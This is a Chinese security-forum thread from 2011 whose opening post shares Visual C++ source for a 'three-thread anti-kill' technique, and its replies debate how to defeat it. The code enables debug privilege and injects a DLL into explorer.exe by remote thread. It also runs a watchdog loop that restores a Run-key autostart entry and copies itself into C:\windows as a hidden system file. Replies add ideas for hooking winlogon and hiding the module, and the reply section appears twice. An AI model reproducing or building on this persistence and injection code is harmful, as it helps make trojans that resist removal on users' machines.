[推荐]关于三线程防杀的一些思想和VC代码-编程技术-看雪-安全社区|安全招聘|kanxue.com

[推荐]关于三线程防杀的一些思想和VC代码

发表于: 2011-3-29 16:38 31066

[推荐]关于三线程防杀的一些思想和VC代码

liuqiangni 活跃值

2011-3-29 16:38

31066

[CODE][CODE]


#include <Tlhelp32.h>
//提权
bool EnablePrivilege(char*PrivilegeName,BOOL IsEnable)

{	
	HANDLE hToken;
	
	TOKEN_PRIVILEGES tp;
	
	LUID luid;	
	
	if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
		
		TOKEN_QUERY | TOKEN_READ,&hToken))
		
	{
		
		return false;
		
	}
		
	if(!LookupPrivilegeValue(NULL, PrivilegeName, &luid))
		
	{
		
		return false;
		
	}
		
	tp.PrivilegeCount           = 1;
	
	tp.Privileges[0].Luid       = luid;
	
	tp.Privileges[0].Attributes = (IsEnable) ? SE_PRIVILEGE_ENABLED : 0;	
	
	BOOL bSucc = AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);	
	
	CloseHandle(hToken);
	
	return (GetLastError() == ERROR_SUCCESS);
	
}



//获取PID值
BOOL GetProcessIdByName(LPSTR szProcessName,LPDWORD lpPID)//PID是我们要传出去的指针变量
{
  //变量及初始化
  STARTUPINFO st;
  PROCESS_INFORMATION pi;
  PROCESSENTRY32 ps;
  HANDLE hSnapshot;
  ZeroMemory(&st,sizeof(STARTUPINFO));
  ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
  st.cb = sizeof(STARTUPINFO);
  ZeroMemory(&ps,sizeof(PROCESSENTRY32));
  ps.dwSize = sizeof(PROCESSENTRY32);
  //遍历进程
  hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  if (hSnapshot == INVALID_HANDLE_VALUE)
  {
    return FALSE;
  }
  if (!Process32First(hSnapshot,&ps))
  {
    return FALSE;
  }

  do 
  {
    //比较进程名
    if (lstrcmpi(ps.szExeFile,szProcessName) == 0) 
    {
      //找到了
      *lpPID = ps.th32ProcessID;
      CloseHandle(hSnapshot);
      return TRUE;
    }
  } while (Process32Next(hSnapshot,&ps));
  //没有找到
  CloseHandle(hSnapshot);
  return FALSE;
}




//注入函数
//pid  我们的目标PID
//szMyDll  我们需要注入的DLL
HANDLE InjeckDll(DWORD pid,CString szMyDll)
{
	EnablePrivilege(SE_DEBUG_NAME,true);
	HANDLE hand = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
	LPVOID Address = NULL;
	PSTR pszLibFileRemote  =(PSTR)VirtualAllocEx(hand,NULL,szMyDll.GetLength()+1,MEM_COMMIT,PAGE_READWRITE);
	::WriteProcessMemory(hand,pszLibFileRemote,szMyDll.GetBuffer(0),szMyDll.GetLength()+1,NULL);
	HMODULE hmod  = ::GetModuleHandle("Kernel32");
	szMyDll.ReleaseBuffer();
	PTHREAD_START_ROUTINE point  = (PTHREAD_START_ROUTINE)::GetProcAddress(hmod,"LoadLibraryA");

	//创建远程线程执行LoadLibraryA 注入我们自己的DLL文件
	HANDLE handr  = CreateRemoteThread(hand,NULL,0,point,(LPVOID)pszLibFileRemote,0,NULL);
	WaitForSingleObject(handr,INFINITE);
	
	EnablePrivilege(SE_DEBUG_NAME,false);//还原权限
	return handr;

}

BOOL Watch(LPVOID pvparam)//这个参数没有什么用,是我刚开始的时候加的,就没有删掉
{
	HANDLE    wethread=(HANDLE)pvparam;
	HKEY              hkey;
	TCHAR             wtname[MAX_PATH] = "C:\\windows\\Main.exe";//这个是写入注册表的路径
	TCHAR             lpdata[MAX_PATH];  
	LPCTSTR           rgspath=_T("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
	DWORD             type=REG_SZ;
	DWORD             dwbuflen=MAX_PATH;  
	int               ret;

	while(1)
	{   
		ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);//打开注册表
		if(ret!=ERROR_SUCCESS)
		{
			OutputDebugString(_T("RegOpenKeyEx for KEY_QUERY_VALUE Error\n"));//调试信息不用管
			break;
		}
		ret=RegQueryValueEx(hkey,"Main.exe",NULL,NULL,(LPBYTE)lpdata,&dwbuflen);//查找有没有Main.exe
		RegCloseKey(hkey);
		if(ret!=ERROR_SUCCESS)
		{
			ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
			if(ret!=ERROR_SUCCESS)
			{
				OutputDebugString(_T("RegOpenKeyEx for KEY_WRITE Error\n"));
				break;
			}
			//如果没有就重新写入我们的Main.exe
			ret=RegSetValueEx(hkey,"Main.exe",NULL,type,(const byte *)wtname,dwbuflen);
			RegCloseKey(hkey);
			if(ret!=ERROR_SUCCESS)
			{
				OutputDebugString(_T("RegSetValueEx Error\n"));
				break;
			}
		}
	
		
			//下面的代码表示如果explorer.exe中没有我们的模块,我们重新注入
			DWORD pid =0;
			GetProcessIdByName("explorer.exe",&pid);//我们选择注入Explorer.exe
			HANDLE DesProcess = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
			if (!EnumMoudle(DesProcess,"KernelSoft.dll"))//自定义函数,查找模块
			{
				InjeckDll(pid,DesDllName);//自定义函数,注入
			}
				

	
		Sleep(1000);	
	}
	return 0;
	

}

//在Windows下寻找我自己的模块,找不到就复制我自己的模块过去
/*
LookFileName[]    Windows下的模块C:\\windows\\Main.exe
name[]		将要复制到C盘的模块的地址,就是当前文件夹的路径

*/
void SetFile(char LookFileName[],char name[])
{
	BOOL sign = FALSE;  //是否找到我需要的文件
	CFileFind ff;
	BOOL work = ff.FindFile("C:\\windows\\");//查找的文件路径,我是硬编码的
	while(work)
	{
		work = ff.FindNextFile();
		CString filepath = ff.GetFilePath();//得到文件的完整路径
		CString MainName;
		MainName.Format("%s",LookFileName);
		if (filepath == MainName)
		{
			sign = TRUE;
			break;
		}
	
	}
	ff.Close();
	if (!sign)//如果没找到,那么复制我自己的文件过去
	{
		
		CopyFile(name,LookFileName,FALSE);//把文件复制到C:\\windows下
		//设置文件属性
		SetFileAttributes(LookFileName,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY);
		
	}
	
	

}

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

上传的附件：

三线程防杀Bin.rar （19.32kb，196次下载）
三线程防杀源代码.rar （38.57kb，273次下载）

收藏・40

免费・7

支持

最新回复 (60) 1 2 3 ▶
miaoling 雪币： 94 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 146 粉丝 0 关注私信	miaoling 2 楼没实用性，要是直接把main.exe干掉了，什么都没了，还不如ssdt hook来的实在 2011-3-29 16:51 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 3 楼你可以干掉试试,等下我传附件上来 2011-3-29 16:54 0
evilkis 雪币： 596 活跃值： (449) 能力值： ( LV12，RANK：320 ) 在线值：发帖 15 回帖 509 粉丝 8 关注私信	evilkis 7 4 楼考虑下自己杀自己的情况吧..自己不能杀自己,岂不是恶意程序了 2011-3-29 17:19 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 5 楼三线程什么的，是上个世纪的玩意儿了吧。。。 2011-3-29 18:01 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 6 楼技术不在乎年月,大学学的东西,哪个不是几百年前的东西,是吧.写这篇文章只我是觉得这个思路很好,至少我这样认为的.可能高手觉得这个很简单,但是有很多人还不是高手 2011-3-29 18:09 0
demoscene 雪币： 1981 活跃值： (771) 能力值： ( LV13，RANK：420 ) 在线值：发帖 30 回帖 355 粉丝 27 关注私信	demoscene 7 7 楼貌似只是 kernelsoft保护 main ,然后wath 保护 kernelsoft. 先咔嚓掉watch然后咔嚓掉kernelsoft然后咔嚓掉main 2011-3-29 18:32 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 8 楼先禁止线程创建然后...一个个杀... 2011-3-29 18:40 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 9 楼 XueTr很强大，拿来对付这个玩下~~ 2011-3-29 18:43 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 10 楼看了下好牛X啊..求杀掉方法 2011-3-29 18:48 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 11 楼无奈之下,结束了explorer.exe 2011-3-29 19:01 0
XPoy 雪币： 242 活跃值： (443) 能力值： ( LV11，RANK：188 ) 在线值：发帖 26 回帖 279 粉丝 5 关注私信	XPoy 3 12 楼 taskkill /f /im "explorer.exe" taskkill /f /im "main.exe" del "c:\windows\system32\main.exe" del "c:\windows\system32\KernelSoft.DLL" 这样行不行呢？我倒觉得现在利用第三方厂商的带签名文件启动固定路径的PE、加载固定名称的DLL来变相启动进程的法子会很麻烦 2011-3-29 19:44 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 13 楼这样肯定行啊,我这只相当于是举了一个例子,抛砖引玉嘛,大家集思广益当然方法更强咯 2011-3-29 20:00 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 14 楼我要是不注入explorer,我注入windows下任何一个关键的进程,那么你终止进程就相当于强行终止系统了,呵呵.. 2011-3-29 20:03 0
ghban 雪币： 364 活跃值： (91) 能力值： ( LV3，RANK：20 ) 在线值：发帖 7 回帖 123 粉丝 0 关注私信	ghban 15 楼做了两个实验想干掉LZ的线程，两个都成功了。第一个实验是手快一点，同时干掉Main.exe和explorer.exe。出现的现象是explorer.exe还能出来，但是Main.exe线程起不来了。第二个实验是用System Safety Monitor (SSM) 用规则不让explorer.exe和Main.exe起来后，慢慢杀掉Main.exe和explorer.exe线程。删除C:\windows\ 下的Main.exe 如果注入windows下关键的进程假设explorer.exe不能干掉第三个实验是用System Safety Monitor (SSM) 用规则不让Main.exe起来后，慢慢杀掉Main.exe线程。删除C:\windows\ 下的Main.exe 也OK了。 2011-3-29 20:16 0
evilkis 雪币： 596 活跃值： (449) 能力值： ( LV12，RANK：320 ) 在线值：发帖 15 回帖 509 粉丝 8 关注私信	evilkis 7 16 楼 XueTr 秒杀之 2011-3-29 20:19 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 17 楼我现在觉得,写这样的代码就该写的绝一点,一动就让你蓝屏或者重启,那样就没这么容易搞定了,呵呵,不该弄这么简单的,简直是献丑嘛你一下弄死2个线程,你的手真快,呵呵,注入的时候360会提示,这一点很容易暴露 2011-3-29 20:43 0
ghban 雪币： 364 活跃值： (91) 能力值： ( LV3，RANK：20 ) 在线值：发帖 7 回帖 123 粉丝 0 关注私信	ghban 18 楼说“同时”有点用词不当但是确实是手动关掉了，用时间差杀掉了Main.exe线程。Main.exe线程不知啥原因起不来了，这个时候C：\windows\下的Main.exe 可以删除了说明它没起来了。谢谢LZ的思路还有源码。可以一起讨论如何改进下。 2011-3-29 20:56 0
ilovehuhu 雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 45 粉丝 0 关注私信	ilovehuhu 19 楼学习了,还是支持源码的交流的,谢谢楼主 2011-3-29 21:19 0
ghban 雪币： 364 活跃值： (91) 能力值： ( LV3，RANK：20 ) 在线值：发帖 7 回帖 123 粉丝 0 关注私信	ghban 20 楼在看雪看了半天贴子了，有点累了，准备休息了，明天还要上班。最后补充一下：其实还有种方法不用任何辅助软件，能在3到5秒内（关键操作时间更短些），干掉Main.exe。 2011-3-29 22:11 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 21 楼其实同时干掉2个进程也不难,写个批处理,taskkill 就OK了,关键如果你不知道它到底注入的是哪个进程,就有点麻烦了,是吧 2011-3-29 22:35 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 22 楼很奇怪,我刚开始调试的时候,360还只是说注入explorer.exe进程,现在一运行直接说是木马,更新真快,直接杀掉了 2011-3-29 22:45 0
叁毛雪币： 7 活跃值： (333) 能力值： ( LV5，RANK：60 ) 在线值：发帖 10 回帖 213 粉丝 2 关注私信	叁毛 1 23 楼 [QUOTE=liuqiangni;941802][前言] 无意中在网上看到了一个帖子关于三线程的问题,我觉得其思路十分巧妙,加之我学HOOK技术也有一段时间了,于是就想看看到底是怎么实现的,那帖子说的不十分清楚,说有源码的,在网上搜确实有源码存在,但是下载都要先注册,然后还有什么下载豆啊,什么的,反正就是不让你下.注册了几个号,都下载不了.在...[/QUOTE] 这几种效率太差了。做2个程序，互相监控，一个挂了，另一个拉起。用互斥量。 2011-3-29 23:24 0
天涯一鸿雪币： 1040 活跃值： (1293) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 440 粉丝 1 关注私信	天涯一鸿 24 楼的确是很旧的东西了……要这样玩的话不如注入winlogon然后教主有个隐藏DLL的东东，不过要进R0，还是直接在R3脱链吧……隐藏之，最后修改startaddress欺骗一下……DLL随便挂钩winlogon一些常用的地方，强制卸载进程就挂了然后系统也挂了……其实直接用main.exe调试入侵winlogon也一样……终止main winlogon也会跟着挂…… 2011-3-29 23:26 0
竹君雪币： 170 活跃值： (90) 能力值： ( LV12，RANK：210 ) 在线值：发帖 66 回帖 911 粉丝 7 关注私信	竹君 5 25 楼鼓励一下吧。共享就是好同志啊。 2011-3-30 00:02 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

liuqiangni

发帖

436

回帖

130

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (60) 1 2 3 ▶
miaoling 雪币： 94 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 146 粉丝 0 关注私信	miaoling 2 楼没实用性，要是直接把main.exe干掉了，什么都没了，还不如ssdt hook来的实在 2011-3-29 16:51 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 3 楼你可以干掉试试,等下我传附件上来 2011-3-29 16:54 0
evilkis 雪币： 596 活跃值： (449) 能力值： ( LV12，RANK：320 ) 在线值：发帖 15 回帖 509 粉丝 8 关注私信	evilkis 7 4 楼考虑下自己杀自己的情况吧..自己不能杀自己,岂不是恶意程序了 2011-3-29 17:19 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 5 楼三线程什么的，是上个世纪的玩意儿了吧。。。 2011-3-29 18:01 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 6 楼技术不在乎年月,大学学的东西,哪个不是几百年前的东西,是吧.写这篇文章只我是觉得这个思路很好,至少我这样认为的.可能高手觉得这个很简单,但是有很多人还不是高手 2011-3-29 18:09 0
demoscene 雪币： 1981 活跃值： (771) 能力值： ( LV13，RANK：420 ) 在线值：发帖 30 回帖 355 粉丝 27 关注私信	demoscene 7 7 楼貌似只是 kernelsoft保护 main ,然后wath 保护 kernelsoft. 先咔嚓掉watch然后咔嚓掉kernelsoft然后咔嚓掉main 2011-3-29 18:32 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 8 楼先禁止线程创建然后...一个个杀... 2011-3-29 18:40 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 9 楼 XueTr很强大，拿来对付这个玩下~~ 2011-3-29 18:43 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 10 楼看了下好牛X啊..求杀掉方法 2011-3-29 18:48 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 11 楼无奈之下,结束了explorer.exe 2011-3-29 19:01 0
XPoy 雪币： 242 活跃值： (443) 能力值： ( LV11，RANK：188 ) 在线值：发帖 26 回帖 279 粉丝 5 关注私信	XPoy 3 12 楼 taskkill /f /im "explorer.exe" taskkill /f /im "main.exe" del "c:\windows\system32\main.exe" del "c:\windows\system32\KernelSoft.DLL" 这样行不行呢？我倒觉得现在利用第三方厂商的带签名文件启动固定路径的PE、加载固定名称的DLL来变相启动进程的法子会很麻烦 2011-3-29 19:44 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 13 楼这样肯定行啊,我这只相当于是举了一个例子,抛砖引玉嘛,大家集思广益当然方法更强咯 2011-3-29 20:00 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 14 楼我要是不注入explorer,我注入windows下任何一个关键的进程,那么你终止进程就相当于强行终止系统了,呵呵.. 2011-3-29 20:03 0
ghban 雪币： 364 活跃值： (91) 能力值： ( LV3，RANK：20 ) 在线值：发帖 7 回帖 123 粉丝 0 关注私信	ghban 15 楼做了两个实验想干掉LZ的线程，两个都成功了。第一个实验是手快一点，同时干掉Main.exe和explorer.exe。出现的现象是explorer.exe还能出来，但是Main.exe线程起不来了。第二个实验是用System Safety Monitor (SSM) 用规则不让explorer.exe和Main.exe起来后，慢慢杀掉Main.exe和explorer.exe线程。删除C:\windows\ 下的Main.exe 如果注入windows下关键的进程假设explorer.exe不能干掉第三个实验是用System Safety Monitor (SSM) 用规则不让Main.exe起来后，慢慢杀掉Main.exe线程。删除C:\windows\ 下的Main.exe 也OK了。 2011-3-29 20:16 0
evilkis 雪币： 596 活跃值： (449) 能力值： ( LV12，RANK：320 ) 在线值：发帖 15 回帖 509 粉丝 8 关注私信	evilkis 7 16 楼 XueTr 秒杀之 2011-3-29 20:19 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 17 楼我现在觉得,写这样的代码就该写的绝一点,一动就让你蓝屏或者重启,那样就没这么容易搞定了,呵呵,不该弄这么简单的,简直是献丑嘛你一下弄死2个线程,你的手真快,呵呵,注入的时候360会提示,这一点很容易暴露 2011-3-29 20:43 0
ghban 雪币： 364 活跃值： (91) 能力值： ( LV3，RANK：20 ) 在线值：发帖 7 回帖 123 粉丝 0 关注私信	ghban 18 楼说“同时”有点用词不当但是确实是手动关掉了，用时间差杀掉了Main.exe线程。Main.exe线程不知啥原因起不来了，这个时候C：\windows\下的Main.exe 可以删除了说明它没起来了。谢谢LZ的思路还有源码。可以一起讨论如何改进下。 2011-3-29 20:56 0
ilovehuhu 雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 45 粉丝 0 关注私信	ilovehuhu 19 楼学习了,还是支持源码的交流的,谢谢楼主 2011-3-29 21:19 0
ghban 雪币： 364 活跃值： (91) 能力值： ( LV3，RANK：20 ) 在线值：发帖 7 回帖 123 粉丝 0 关注私信	ghban 20 楼在看雪看了半天贴子了，有点累了，准备休息了，明天还要上班。最后补充一下：其实还有种方法不用任何辅助软件，能在3到5秒内（关键操作时间更短些），干掉Main.exe。 2011-3-29 22:11 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 21 楼其实同时干掉2个进程也不难,写个批处理,taskkill 就OK了,关键如果你不知道它到底注入的是哪个进程,就有点麻烦了,是吧 2011-3-29 22:35 0
liuqiangni 雪币： 69 活跃值： (157) 能力值： ( LV8，RANK：130 ) 在线值：发帖 32 回帖 436 粉丝 2 关注私信	liuqiangni 2 22 楼很奇怪,我刚开始调试的时候,360还只是说注入explorer.exe进程,现在一运行直接说是木马,更新真快,直接杀掉了 2011-3-29 22:45 0
叁毛雪币： 7 活跃值： (333) 能力值： ( LV5，RANK：60 ) 在线值：发帖 10 回帖 213 粉丝 2 关注私信	叁毛 1 23 楼 [QUOTE=liuqiangni;941802][前言] 无意中在网上看到了一个帖子关于三线程的问题,我觉得其思路十分巧妙,加之我学HOOK技术也有一段时间了,于是就想看看到底是怎么实现的,那帖子说的不十分清楚,说有源码的,在网上搜确实有源码存在,但是下载都要先注册,然后还有什么下载豆啊,什么的,反正就是不让你下.注册了几个号,都下载不了.在...[/QUOTE] 这几种效率太差了。做2个程序，互相监控，一个挂了，另一个拉起。用互斥量。 2011-3-29 23:24 0
天涯一鸿雪币： 1040 活跃值： (1293) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 440 粉丝 1 关注私信	天涯一鸿 24 楼的确是很旧的东西了……要这样玩的话不如注入winlogon然后教主有个隐藏DLL的东东，不过要进R0，还是直接在R3脱链吧……隐藏之，最后修改startaddress欺骗一下……DLL随便挂钩winlogon一些常用的地方，强制卸载进程就挂了然后系统也挂了……其实直接用main.exe调试入侵winlogon也一样……终止main winlogon也会跟着挂…… 2011-3-29 23:26 0
竹君雪币： 170 活跃值： (90) 能力值： ( LV12，RANK：210 ) 在线值：发帖 66 回帖 911 粉丝 7 关注私信	竹君 5 25 楼鼓励一下吧。共享就是好同志啊。 2011-3-30 00:02 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复